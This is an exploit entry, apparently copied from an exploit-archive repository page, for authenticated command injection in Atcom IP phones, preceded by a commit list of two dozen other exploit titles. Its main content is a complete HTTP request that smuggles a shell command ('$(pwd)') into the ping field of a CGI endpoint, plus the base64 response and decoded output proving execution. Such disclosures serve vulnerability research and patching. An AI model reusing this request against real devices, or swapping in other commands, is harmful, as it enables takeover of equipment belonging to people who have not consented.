f3649a641f
24 changes to exploits/shellcodes/ghdb Minio 2022-07-29T19-40-48Z - Path traversal Tinycontrol LAN Controller v3 (LK3) 1.58a - Remote Denial Of Service Atcom 2.7.x.x - Authenticated Command Injection Ruijie Reyee Mesh Router - MITM Remote Code Execution (RCE) Tinycontrol LAN Controller v3 (LK3) 1.58a - Remote Admin Password Change Tinycontrol LAN Controller v3 (LK3) 1.58a - Remote Credentials Extraction OpenPLC WebServer 3 - Denial of Service Splunk 9.0.5 - admin account take over BoidCMS v2.0.0 - authenticated file upload vulnerability Cacti 1.2.24 - Authenticated command injection when using SNMP options Chitor-CMS v1.1.2 - Pre-Auth SQL Injection Clcknshop 1.0.0 - SQL Injection Coppermine Gallery 1.6.25 - RCE Crypto Currency Tracker (CCT) 9.5 - Admin Account Creation (Unauthenticated) GLPI GZIP(Py3) 9.4.5 - RCE Limo Booking Software v1.0 - CORS Media Library Assistant Wordpress Plugin - RCE and LFI Online ID Generator 1.0 - Remote Code Execution (RCE) Shuttle-Booking-Software v1.0 - Multiple-SQLi Webedition CMS v2.9.8.8 - Blind SSRF WEBIGniter v28.7.23 File Upload - Remote Code Execution Wordpress Plugin Masterstudy LMS - 3.0.17 - Unauthenticated Instructor Account Creation Wordpress Sonaar Music Plugin 4.7 - Stored XSS Microsoft Windows 11 - 'apds.dll' DLL hijacking (Forced)
36 lines
No EOL
1.2 KiB
Text
36 lines
No EOL
1.2 KiB
Text
# Exploit Title: Atcom 2.7.x.x - Authenticated Command Injection
|
|
# Google Dork: N/A
|
|
# Date: 07/09/2023
|
|
# Exploit Author: Mohammed Adel
|
|
# Vendor Homepage: https://www.atcom.cn/
|
|
# Software Link:
|
|
https://www.atcom.cn/html/yingwenban/Product/Fast_IP_phone/2017/1023/135.html
|
|
# Version: All versions above 2.7.x.x
|
|
# Tested on: Kali Linux
|
|
|
|
|
|
Exploit Request:
|
|
|
|
POST /cgi-bin/web_cgi_main.cgi?user_get_phone_ping HTTP/1.1
|
|
Host: {TARGET_IP}
|
|
User-Agent: polar
|
|
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
|
|
X-Requested-With: XMLHttpRequest
|
|
Content-Length: 49
|
|
Authorization: Digest username="admin", realm="IP Phone Web
|
|
Configuration", nonce="value_here",
|
|
uri="/cgi-bin/web_cgi_main.cgi?user_get_phone_ping",
|
|
response="value_here", qop=auth, nc=value_here, cnonce="value_here"
|
|
|
|
cmd=0.0.0.0$(pwd)&ipv4_ipv6=0&user_get_phone_ping
|
|
|
|
|
|
Response:
|
|
|
|
{"ping_cmd_result":"cGluZzogYmFkIGFkZHJlc3MgJzAuMC4wLjAvdXNyL2xvY2FsL2FwcC9saWdodHRwZC93d3cvY2dpLWJpbicK","ping_cmd":"0.0.0.0$(pwd)"}
|
|
|
|
The value of "ping_cmd_result" is encoded as base64. Decoding the
|
|
value of "ping_cmd_result" reveals the result of the command executed
|
|
as shown below:
|
|
|
|
ping: bad address '0.0.0.0/usr/local/app/lighttpd/www/cgi-bin' |